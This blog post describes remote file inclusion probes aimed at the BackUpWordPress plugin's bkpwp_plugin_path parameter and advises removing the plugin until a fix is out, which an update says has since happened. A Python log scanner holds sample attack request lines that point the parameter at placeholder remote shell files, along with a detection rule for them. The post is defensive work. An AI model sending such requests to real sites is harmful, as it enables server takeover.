Over the last few days I’ve been noticing quite a few hits on my blog for various non-existent pages. Each of these hits takes the form of:
bkpwp_plugin_path=URL of a text file on another website
Checking the URL in the page request returns a text file containing PHP code that attempts to launch a remote shell.
The first part of the page request is a reference to a plugin for WordPress called BackUpWordPress. This plugin automatically backs up your WordPress database and files. According to Security Focus, the plugin does not properly check user-provided input, thereby possibly allowing remote users to access your hosting provider’s server.
At this point in time there is no update available to resolve this issue. If you’re using this plugin, then until a fix is made available, the safest option is to deactivate and remove the plugin.
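If you want to check whether your own site is seeing these requests, the following is an added example (not part of the original post) that scans Apache combined-format access logs for requests whose `bkpwp_plugin_path` parameter points at a URL on another host. The log lines, IP addresses, paths and hostnames in it are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format); the plugin
# paths, addresses and remote hostnames are placeholders, not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2000:12:01:02 +0000] "GET /wp-content/plugins/plugin-placeholder/backup.php?bkpwp_plugin_path=http://example.invalid/shell.txt? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
198.51.100.7 - - [01/Jan/2000:12:02:10 +0000] "GET /about/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2000:12:03:44 +0000] "GET /index.php?bkpwp_plugin_path=https://example.invalid/id.txt HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
203.0.113.9 - - [01/Jan/2000:12:04:00 +0000] "GET /index.php?bkpwp_plugin_path=/var/www/plugin/ HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
"""

# Captures client IP, timestamp, request target and HTTP status from a log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def is_remote_include_attempt(target: str, param: str = "bkpwp_plugin_path") -> bool:
    """True when the query string sets `param` to a URL on another host.

    A local filesystem path in the same parameter is not flagged by this rule;
    the post describes the remote-URL variant, so that is what we match.
    """
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return any(v.lower().startswith(REMOTE_SCHEMES) for v in qs.get(param, []))


def find_rfi_attempts(log_text: str):
    """Return (ip, timestamp, target, status) for every flagged request.

    The status is kept because a 404 (the plugin is not installed) and a 200
    (the request reached a handler) call for different follow-up.
    """
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_remote_include_attempt(m["target"]):
            hits.append((m["ip"], m["ts"], m["target"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, ts, target, status in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ts} {ip} {status} {target}")
```

Against a real log, feed the file contents to `find_rfi_attempts` and pay particular attention to flagged requests that returned 200 rather than 404.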
Update: Since I wrote this piece, the BackUpWordPress plugin has been updated to fix this issue. Kudos to the developer for releasing a fix so quickly. More details in this comment.